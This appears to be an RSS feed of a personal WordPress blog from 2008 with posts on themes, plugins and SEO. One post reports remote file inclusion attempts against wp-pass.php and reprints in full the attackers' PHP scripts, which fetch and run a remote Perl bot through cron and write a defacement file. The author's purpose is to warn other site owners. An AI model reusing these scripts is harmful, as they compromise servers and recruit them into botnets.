<?xml version="1.0" encoding="UTF-8"?> <rss
version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
><channel><title>mou.me.uk &#187; wordpress</title> <atom:link href="http://mou.me.uk/category/wordpress/feed/" rel="self" type="application/rss+xml" /><link>http://mou.me.uk</link> <description>A little piece of the web</description> <lastBuildDate>Wed, 02 Nov 2011 11:29:14 +0000</lastBuildDate> <language>en</language> <sy:updatePeriod>hourly</sy:updatePeriod> <sy:updateFrequency>1</sy:updateFrequency> <generator>http://wordpress.org/?v=3.3.2</generator> <item><title>Sorry to everyone&#8230;</title><link>http://mou.me.uk/2008/11/26/sorry-to-everyone/</link> <comments>http://mou.me.uk/2008/11/26/sorry-to-everyone/#comments</comments> <pubDate>Wed, 26 Nov 2008 12:39:06 +0000</pubDate> <dc:creator>mou</dc:creator> <category><![CDATA[wordpress]]></category> <category><![CDATA[facebook]]></category> <category><![CDATA[modmat]]></category> <category><![CDATA[plugin]]></category> <category><![CDATA[theme]]></category><guid
isPermaLink="false">http://mou.me.uk/?p=467</guid> <description><![CDATA[&#8230; who&#8217;s emailed me in the past 2 weeks, mainly regarding updates to Modmat and the Facebook Dashboard Widget (what with WordPress 2.7 on the horizon). Its been a stupidly busy month for me so far. Some specific apps Ive been helping to write for the Christmas period are due for launch in a few [...]]]></description> <content:encoded><![CDATA[<p>&#8230; who&#8217;s emailed me in the past 2 weeks, mainly regarding updates to <a
href="/projects/wordpress/themes/modmat/">Modmat</a> and the <a
href="/projects/wordpress/plugins/facebook-dashboard-widget">Facebook Dashboard Widget</a> (what with <a
href="http://wordpress.org/">WordPress 2.7</a> on the horizon).</p><p>Its been a stupidly busy month for me so far.  Some specific apps Ive been helping to write for the Christmas period are due for launch in a few days, plus Ive been freelancing on the side.  All in all, November hasn&#8217;t given me much time to myself!</p><p>So, to address the issues here:</p><p>I know Modmat needs updates to handle things like threaded comments, etc.  Ive started work but haven&#8217;t had a chance to finish yet as I havent fully studied 2.7 and so don&#8217;t want to release and discover later I&#8217;m missed support for something.  Modmat <em>should</em> work with 2.7 out of the box, so you shouldn&#8217;t have to worry about the theme breaking &#8211;  but obviously changes will need to be made to support the new features.  I&#8217;ll post here when its done and upload the latest files to the <a
href="/projects/wordpress/themes/modmat/">project page</a>.</p><p>Facebook Dashboard Widget  &#8211; again, Ive spotted it isn&#8217;t working.  This shouldn&#8217;t be too difficult to fix but I need to find an hour or so free to look into it.  I&#8217;m hoping to have an update out in the next few days &#8211; time permitting.</p><p>So sorry to anyone I haven&#8217;t got back to.  I haven&#8217;t forgotten about you, and I still have your emails here.  The response just may be a bit delayed. <img
src='http://mou.me.uk/cms/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /></p> ]]></content:encoded> <wfw:commentRss>http://mou.me.uk/2008/11/26/sorry-to-everyone/feed/</wfw:commentRss> <slash:comments>1</slash:comments> </item> <item><title>Modmat Mod!</title><link>http://mou.me.uk/2008/09/16/modmat-mod/</link> <comments>http://mou.me.uk/2008/09/16/modmat-mod/#comments</comments> <pubDate>Tue, 16 Sep 2008 11:55:44 +0000</pubDate> <dc:creator>mou</dc:creator> <category><![CDATA[wordpress]]></category> <category><![CDATA[modmat]]></category> <category><![CDATA[referrer]]></category> <category><![CDATA[WordPress themes]]></category><guid
isPermaLink="false">http://mou.me.uk/?p=372</guid> <description><![CDATA[Just spotted a modified version of my free Modmat WordPress theme when looking through my referrers. I wanted to send him a quick email to say well done (seriously, I love it) but the sites in Russian and I don&#8217;t know the Ruskie for &#8220;Contact Me&#8221;, so I thought I&#8217;d give him a little link [...]]]></description> <content:encoded><![CDATA[<p><a
href="http://streetart.dp.ua/">Just spotted a modified version</a> of my free <a
href="/projects/wordpress/themes/modmat/">Modmat WordPress theme</a> when looking through my referrers.  I wanted to send him a quick email to say well done (seriously, I love it) but the sites in Russian and I don&#8217;t know the Ruskie for &#8220;Contact Me&#8221;, so I thought I&#8217;d give him a little link love instead. <img
src='http://mou.me.uk/cms/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /></p><p>Its crazy some of the sites you see turning up in your referrers list when you release a theme with your link on the bottom.  As well as hundreds others, so far I&#8217;m up to 4 straight porn blogs, 3 gay porn blogs, 6 (seriously!!) dominatrix blogs and a &#8220;pay us for pain&#8221; type site.  Nice!  Looks like I&#8217;m hitting all the niches!!</p><p>Its almost made me want to throw another one together.  In fact, theres no almost about it &#8211; there could be thousands of porn sites out there waiting for me to get off my arse (not literally) and do a design they can use &#8211; I don&#8217;t want to let them down! <img
src='http://mou.me.uk/cms/wp-includes/images/smilies/icon_wink.gif' alt=';-)' class='wp-smiley' /></p><p>So now just the age old problem &#8211; finding enough spare time!</p> ]]></content:encoded> <wfw:commentRss>http://mou.me.uk/2008/09/16/modmat-mod/feed/</wfw:commentRss> <slash:comments>3</slash:comments> </item> <item><title>Modmat on WordPress Extend</title><link>http://mou.me.uk/2008/07/22/modmat-on-wordpress-extend/</link> <comments>http://mou.me.uk/2008/07/22/modmat-on-wordpress-extend/#comments</comments> <pubDate>Tue, 22 Jul 2008 12:07:51 +0000</pubDate> <dc:creator>mou</dc:creator> <category><![CDATA[wordpress]]></category> <category><![CDATA[modmat]]></category> <category><![CDATA[wordpress extend]]></category> <category><![CDATA[WordPress themes]]></category><guid
isPermaLink="false">http://mou.me.uk/?p=172</guid> <description><![CDATA[Modmat, a WordPress theme I put together a few months ago, has been accepted onto the new WordPress Extend themes site. Cool! Unsurprisingly, exposing it to so many people has surfaced a few minor bugs, which are now fixed. Modmat 1.0.3 is now available from the Modmat project page. I&#8217;ve submitted the updates to WordPress, [...]]]></description> <content:encoded><![CDATA[<p><a
href="/projects/wordpress/themes/modmat/">Modmat</a>, a WordPress theme I put together a few months ago, has been accepted onto the new <a
href="http://wordpress.org/extend/themes/modmat">WordPress Extend themes site</a>.  Cool!</p><p>Unsurprisingly, exposing it to so many people has surfaced a few minor bugs, which are now fixed.  Modmat 1.0.3 is now available from <a
href="/projects/wordpress/themes/modmat/">the Modmat project page</a>.  I&#8217;ve submitted the updates to WordPress, so hopefully the new version will appear in the next day or so (currently showing as 1.0.2).</p><p>Download it and try it out!  If come across any bugs, or have any suggestions or gripes, either <a
href="/projects/wordpress/themes/modmat/#comments">post me a comment</a> or <a
href="/contact/">fire me out an email</a> and let me know!</p><p>Thanks to the 3000-odd people that have downloaded it so far, and the great number of sites that are actually now using it (Yahoo site explorer is a great toy <img
src='http://mou.me.uk/cms/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> ).  You&#8217;ve prompted me to start work on a completely new theme, and I hope to release a 2 column Modmat clone in the not too distant future, following on from user feedback.</p><p>Thanks again for making the effort feel worthwhile!! <img
src='http://mou.me.uk/cms/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /></p> ]]></content:encoded> <wfw:commentRss>http://mou.me.uk/2008/07/22/modmat-on-wordpress-extend/feed/</wfw:commentRss> <slash:comments>2</slash:comments> </item> <item><title>WordPress 2.5 and Automatic Plugin Upgrades</title><link>http://mou.me.uk/2008/04/03/wordpress-25-and-automatic-plugin-upgrades/</link> <comments>http://mou.me.uk/2008/04/03/wordpress-25-and-automatic-plugin-upgrades/#comments</comments> <pubDate>Thu, 03 Apr 2008 11:43:59 +0000</pubDate> <dc:creator>mou</dc:creator> <category><![CDATA[wordpress]]></category> <category><![CDATA[plugins]]></category> <category><![CDATA[wordpress 2.5]]></category><guid
isPermaLink="false">http://mou.me.uk/2008/04/03/wordpress-25-and-automatic-plugin-upgrades/</guid> <description><![CDATA[I guess it sums up my luck that after a month of Beta testing, RC testing and now testing the full release, I&#8217;ve never managed to get the new WordPress Automatic Plugin Upgrade system to work on my server (which currently has its share of problems it seems, but unfortunately none of them seem to [...]]]></description> <content:encoded><![CDATA[<p><a
href='http://static.mou.me.uk/uploads/migrated/wp.png' title='WordPress Logo'><img
src='http://static.mou.me.uk/uploads/migrated/wp.png' alt='WordPress Logo' class="alignleft" /></a>I guess it sums up my luck that after a month of Beta testing, RC testing and now testing the full release, I&#8217;ve never managed to get the new <a
href="http://www.unfoldingneurons.com/2008/be-careful-using-the-automatic-plugins-upgrades-in-wordpress-25">WordPress Automatic Plugin Upgrade system</a> to work on my server (which currently has its share of problems it seems, but unfortunately none of them seem to apply to my situation).</p><p>Admittedly, I havent put much time into figuring out the problem.  I had a quick look, then gave up after I noticed I was getting any of about 4 different errors depending on when I tried to use it.  fsock errors, unzipping errors and now a &#8220;cannot create folder&#8221; error.</p><p>Hopeully its a permissions thing, in which case &#8211; what folder needs to be chmoded?  Most likely the plugins folder (assuming its not trying to create a temp folder somewhere), but then I have to ask myself &#8211; do I really want to change the permissions on my entire plugins folder?  Bit of further investigation needed methinks&#8230;</p><p>I&#8217;ve seen it in action on my workmates installation and it looks pretty damn cool.  Plus anything that can save me 10 minutes on mundane tasks is always a bonus.  :sigh: I guess I&#8217;ll bite the bullet and change the permissions.  A little annoying though as I generally try and keep all my core files owned by root, then avoid using my root account whereever possible.  Not the most effective line of security, but hopefully it&#8217;d give any would-be hackers a harder time compromising my installation&#8230;</p><p>But then again, I may just sack the whole thing off for now.  The SWF uploader looks sweet, the colour scheme/layout is a MASSIVE improvement (regardless of what the &#8220;I don&#8217;t like change&#8221; crowd are saying) and it seems to perform a little better &#8211; on my local installation at least.  But&#8230; its a big release, so bugs are almost inevitable.  2.3.3 is a stable release, so maybe waiting for 2.5.1 would be more sensible&#8230;</p> ]]></content:encoded> <wfw:commentRss>http://mou.me.uk/2008/04/03/wordpress-25-and-automatic-plugin-upgrades/feed/</wfw:commentRss> <slash:comments>2</slash:comments> </item> <item><title>WordPress SEO White Paper</title><link>http://mou.me.uk/2008/02/26/wordpress-seo-white-paper/</link> <comments>http://mou.me.uk/2008/02/26/wordpress-seo-white-paper/#comments</comments> <pubDate>Tue, 26 Feb 2008 10:48:31 +0000</pubDate> <dc:creator>mou</dc:creator> <category><![CDATA[seo]]></category> <category><![CDATA[wordpress]]></category> <category><![CDATA[white paper]]></category><guid
isPermaLink="false">http://mou.me.uk/2008/02/26/wordpress-seo-white-paper/</guid> <description><![CDATA[There&#8217;s a WordPress SEO white paper available that describes some good ways to get more attention from the search engines. Its been around about a week, but Ive only just had the chance to read it through in the last day or 2. Well worth a read, if only for the list of relevant SEO [...]]]></description> <content:encoded><![CDATA[<p>There&#8217;s a <a
href="http://www.blizzardinternet.com/seo-for-wordpress-blogs-free-marketing-whitepaper/"> WordPress SEO white paper</a> available that describes some good ways to get more attention from the search engines.  Its been around about a week, but Ive only just had the chance to read it through in the last day or 2.</p><p>Well worth a read, if only for the list of relevant SEO plugins.  One thing I took from this is the fact that I now have a lot of duplicate content since the release of WP 2.3, because I didn&#8217;t take account of the new &#8220;tag urls&#8221;.  This can be fixed by using &#8220;excerpts&#8221; in posts, to keep the tag/category pages unique (depending on which one I allow the search engines to index).  I&#8217;m glad I picked that little gem up now when I only have 2 dozen posts to edit, rather than in 2 years time.</p><p>A lot of whats on here are tips Ive seen elsewhere over the last year or so, but its good to have it all and more in one report (plus it makes good reading when your companies network goes down for the second time in a week!)</p><p>Hat tip to the authors, <a
href="http://www.blizzardinternet.com">Blizzard Internet</a> and <a
href="http://weblogtoolscollection.com">Weblog Tools Collection</a> for pointing me in its direction.</p> ]]></content:encoded> <wfw:commentRss>http://mou.me.uk/2008/02/26/wordpress-seo-white-paper/feed/</wfw:commentRss> <slash:comments>2</slash:comments> </item> <item><title>How many times do I have to tell you?  My wp-pass.php is patched!!</title><link>http://mou.me.uk/2008/02/13/hackers-attempting-to-exploit-a-wordpress-vulnerability-using-wp-pass-php/</link> <comments>http://mou.me.uk/2008/02/13/hackers-attempting-to-exploit-a-wordpress-vulnerability-using-wp-pass-php/#comments</comments> <pubDate>Wed, 13 Feb 2008 00:18:09 +0000</pubDate> <dc:creator>mou</dc:creator> <category><![CDATA[geeky]]></category> <category><![CDATA[wordpress]]></category> <category><![CDATA[exploit]]></category> <category><![CDATA[unix]]></category> <category><![CDATA[vulnerability]]></category> <category><![CDATA[wp-pass.php]]></category><guid
isPermaLink="false">http://mou.me.uk/2008/02/13/hackers-attempting-to-exploit-a-wordpress-vulnerability-using-wp-pass-php/</guid> <description><![CDATA[Since the new year &#8211; new years day, strangely enough &#8211; Ive noticed a change in the way &#8220;the bad guys&#8221; try to interact with my site. Spam has slowed to a trickle, whereas attempts to exploit WordPress vulnerabilities seem to have increased 10 fold. Seriously, I don&#8217;t use Askimet &#8211; just comment moderation &#8211; [...]]]></description> <content:encoded><![CDATA[<p>Since the new year &#8211; new years day, strangely enough &#8211; Ive noticed a change in the way &#8220;the bad guys&#8221; try to interact with my site.  Spam has slowed to a trickle, whereas attempts to exploit WordPress vulnerabilities seem to have increased 10 fold.</p><p>Seriously, I don&#8217;t use Askimet &#8211; just comment moderation &#8211; and  if I didn&#8217;t know better I&#8217;d think the blog spam epidemic was over!  (we can all wish)</p><p>But the exploits&#8230; it always seems to be the same type, all of which (so far) have been stopped by the fact I update my WordPress install regularly.  The common trick is using the <a
href="http://blogsecurity.net/news/news-050707/">wp-pass.php</a> vulnerability, which was <em>apparently</em> <a
href="http://blogsecurity.net/news/news-050707/">fixed in wp 2.2.2</a>.  Basically, my logs show a 404 from this address like this:</p><pre>http://mou.me.uk/wp-pass.php/?_wp_http_referer=http://frikyrkja.net/config/exp667.txt?</pre><p>(We can assume http://frikyrkja.net is <em>probably</em> a compromised server somewhere)</p><p>So, of course, I check out this site and take a look what nasty code they&#8217;re trying to execute. 9 times out of 10, its looked relatively harmless:<br
/> <span
id="more-84"></span></p><pre>
$cmd="id";

$eseguicmd=ex($cmd);

echo $eseguicmd;

function ex($cfe){

$res = '';

if (!empty($cfe)){

if(function_exists('exec')){

@exec($cfe,$res);

$res = join("\n",$res);

}

elseif(function_exists('shell_exec')){

$res = @shell_exec($cfe);

}

elseif(function_exists('system')){

@ob_start();

@system($cfe);

$res = @ob_get_contents();

@ob_end_clean();

}

elseif(function_exists('passthru')){

@ob_start();

@passthru($cfe);

$res = @ob_get_contents();

@ob_end_clean();

}

elseif(@is_resource($f = @popen($cfe,"r"))){

$res = "";

while(!@feof($f)) { $res .= @fread($f,1024); }

@pclose($f);

}}

return $res;

}</pre><p>This seems like more of a fact finder &#8211; testing to see if your server is vulnerable, etc.  But today, I came across a particularly bad one:</p><pre>
//exploiter v0.01 for rfi reloader by axe
$safemode=@ini_get('safe_mode');

if (@$_GET['filexp']) {
 if (@$_GET['deface_msg'])
 {
 	$deface_msg = $_GET['deface_msg'];
 }
 else
 {
 	$deface_msg = 'Patched Mother Fucker :p';
 }

 $filexp = $_GET['filexp'];

 $fp = fopen("$filexp","w");
 	if ($fp)
 	{
 		fwrite($fp,$deface_msg);
 		fclose($fp);
 	}
 }

$fp = file_exists('index.php');

if ($fp)
{
}
else
{
passthru('touch index.php');
}

if ($safemode)
{
ini_restore("safe_mode");
ini_restore("open_basedir");

shell_exec('killall -9 perl');
shell_exec('wget http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/popup.txt;mv popup.txt fab666.php');
shell_exec('curl -O http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/popup.txt;mv popup.txt fab666.php');
shell_exec('lwp-download http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/popup.txt;mv popup.txt fab666.php');

shell_exec('fetch http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/popup.txt;mv popup.txt fab666.php;rm -rf popup.txt*');
shell_exec("cd /tmp;echo '*/1 * * * * perl /tmp/.tmp/tmpfile' &gt;cron.job;crontab cron.job;rm -rf cron.job");
shell_exec('cd /tmp;mkdir .tmp;cd /tmp/.tmp;wget http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
shell_exec('cd /tmp;mkdir .tmp;cd /tmp/.tmp;curl -O http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
shell_exec('cd /tmp;mkdir .tmp;cd /tmp/.tmp;lwp-download http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
shell_exec('cd /tmp;mkdir .tmp;cd /tmp/.tmp;lynx -source http://frikyrkja.net/config/brazil667.txt &gt;brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
shell_exec('cd /tmp;mkdir .tmp;cd /tmp/.tmp;fetch http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
shell_exec('cd /tmp;mkdir .tmp;cd /tmp/.tmp;GET http://frikyrkja.net/config/brazil667.txt &gt;brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
shell_exec('cd /dev/shm;wget http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
shell_exec('cd /dev/shm;curl -O http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
shell_exec('cd /dev/shm;lwp-download http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
shell_exec('cd /dev/shm;lynx -source http://frikyrkja.net/config/brazil667.txt &gt;brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
shell_exec('cd /dev/shm;fetch http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
shell_exec('cd /dev/shm;GET http://frikyrkja.net/config/brazil667.txt &gt;brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');

}
else
{

passthru('killall -9 perl');
passthru('wget http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/popup.txt;mv popup.txt fab666.php');

passthru('curl -O http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/popup.txt;mv popup.txt fab666.php');
passthru('lwp-download http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/popup.txt;mv popup.txt fab666.php');
passthru('fetch http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/popup.txt;mv popup.txt fab666.php;rm -rf popup.txt*');
passthru("cd /tmp;echo '*/1 * * * * perl /tmp/.tmp/tmpfile' &gt;cron.job;crontab cron.job;rm -rf cron.job");
passthru('cd /tmp;mkdir .tmp;cd /tmp/.tmp;wget http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
passthru('cd /tmp;mkdir .tmp;cd /tmp/.tmp;curl -O http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
passthru('cd /tmp;mkdir .tmp;cd /tmp/.tmp;lwp-download http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
passthru('cd /tmp;mkdir .tmp;cd /tmp/.tmp;lynx -source http://frikyrkja.net/config/brazil667.txt &gt;brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
passthru('cd /tmp;mkdir .tmp;cd /tmp/.tmp;fetch http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
passthru('cd /tmp;mkdir .tmp;cd /tmp/.tmp;GET http://frikyrkja.net/config/brazil667.txt &gt;brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
passthru('cd /dev/shm;wget http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
passthru('cd /dev/shm;curl -O http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
passthru('cd /dev/shm;lwp-download http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
passthru('cd /dev/shm;lynx -source http://frikyrkja.net/config/brazil667.txt &gt;brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
passthru('cd /dev/shm;fetch http://frikyrkja.net/config/brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');
passthru('cd /dev/shm;GET http://frikyrkja.net/config/brazil667.txt &gt;brazil667.txt;mv brazil667.txt tmpfile;chmod +x tmpfile;perl tmpfile;./tmpfile;rm -rf brazil667.txt*');

}</pre><p>I&#8217;ll be the first to admit my Unix knowledge leaves a lot to be desired, but from what I can see this looks to be setting up a cron job to run a file 1 minute later before creating a folder and uses every method it can to try to download a text file to your server, which is then executed when the minute is up and the cron job deletes itself.  Clever.  You can see an example of the text file by <a
href="/uploads/wp-pass_exploit.txt">clicking here</a>.  (Note: Ive added an <code>exit;</code> command top to stop the b*astards using this text file on other people!)</p><p>Scary as hell.  I havent had a chance to sit down and puzzle out exactly what this script does if you execute it, but I&#8217;m willing to bet its not pretty.  There seems to be some code to connect to an IRC server, so the point of this is most likely to turn your server into a zombie bot.  Or possibly to host exploit scripts for other unpatched WP users to download.  I&#8217;ll know more when I go through it properly (and hopefully learn a few new things about Unix!!)</p><p>The moral of the story? <a
href="http://wordpress.org/download/">Keep your WordPress up to date</a>! <img
src='http://mou.me.uk/cms/wp-includes/images/smilies/icon_biggrin.gif' alt=':grin:' class='wp-smiley' /> No seriously, go do it now&#8230;</p> ]]></content:encoded> <wfw:commentRss>http://mou.me.uk/2008/02/13/hackers-attempting-to-exploit-a-wordpress-vulnerability-using-wp-pass-php/feed/</wfw:commentRss> <slash:comments>0</slash:comments> </item> <item><title>AngelDown.co.uk relaunched</title><link>http://mou.me.uk/2008/01/14/angeldowncouk-relaunched/</link> <comments>http://mou.me.uk/2008/01/14/angeldowncouk-relaunched/#comments</comments> <pubDate>Mon, 14 Jan 2008 15:55:03 +0000</pubDate> <dc:creator>mou</dc:creator> <category><![CDATA[coding]]></category> <category><![CDATA[wordpress]]></category> <category><![CDATA[angeldown]]></category> <category><![CDATA[freelance]]></category> <category><![CDATA[php]]></category><guid
isPermaLink="false">http://mou.me.uk/2008/01/14/angeldowncouk-relaunched/</guid> <description><![CDATA[After realising last week that I&#8217;m still paying for 3 separate web hosting packages, this weekend seemed like a good time to think about consolidating all the sites I&#8217;m hosting for people onto a single server. 2 of the sites I put together when I first started out and so need to be recoded from [...]]]></description> <content:encoded><![CDATA[<p><a
href='http://www.angeldown.co.uk/' title='Angel Down v3 Screenshot' target="_blank"><img
src='http://static.mou.me.uk/uploads/migrated/adv3-screenshot.jpg' alt='Angel Down v3 Screenshot' class="alignleft" /></a>After realising last week that I&#8217;m still paying for 3 separate web hosting packages, this weekend seemed like a good time to think about consolidating all the sites I&#8217;m hosting for people onto a single server.  2 of the sites I put together when I first started out and so need to be recoded from classic ASP to PHP.  The result of the first conversion &#8211; <a
href="http://www.angeldown.co.uk/" target="_blank">AngelDown.co.uk</a> v3.</p><p>Now built on WordPress, the site upgrade now allows commenting on individual posts, auto sitemap generation, the code is a lot cleaner (I&#8217;m a lot better at CSS now than I was 2 years ago!!) and it should make any future additions a lot easier (theres been some talk of selling band merchandise from the website&#8230;).</p><p>The drummer&#8217;s my flatmate &#8211; hence the fact I agreed to a day of unpaid work!  Check them out &#8211; <a
href="http://www.angeldown.co.uk/" title="Check out AngelDown.co.uk">http://www.angeldown.co.uk/</a>.  They&#8217;ve knocked out a few good tunes over the last few years &#8211; &#8220;Still falling&#8221; is a personal favourite of mine.</p><p>Credit to <a
href="http://gigpress.com/" target="_blank">GigPress</a>, which on its own made the entire project worth doing &#8211; writing a gig admin back-end myself would have taken a least a day, this plugin took me less than an hour to customise.</p> ]]></content:encoded> <wfw:commentRss>http://mou.me.uk/2008/01/14/angeldowncouk-relaunched/feed/</wfw:commentRss> <slash:comments>0</slash:comments> </item> </channel> </rss>
<!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/

Minified using disk: basic
Page Caching using disk: enhanced
Database Caching 4/29 queries in 0.009 seconds using memcached
Object Caching 540/614 objects using apc

Served from: mou.me.uk @ 2012-05-17 03:33:45 -->
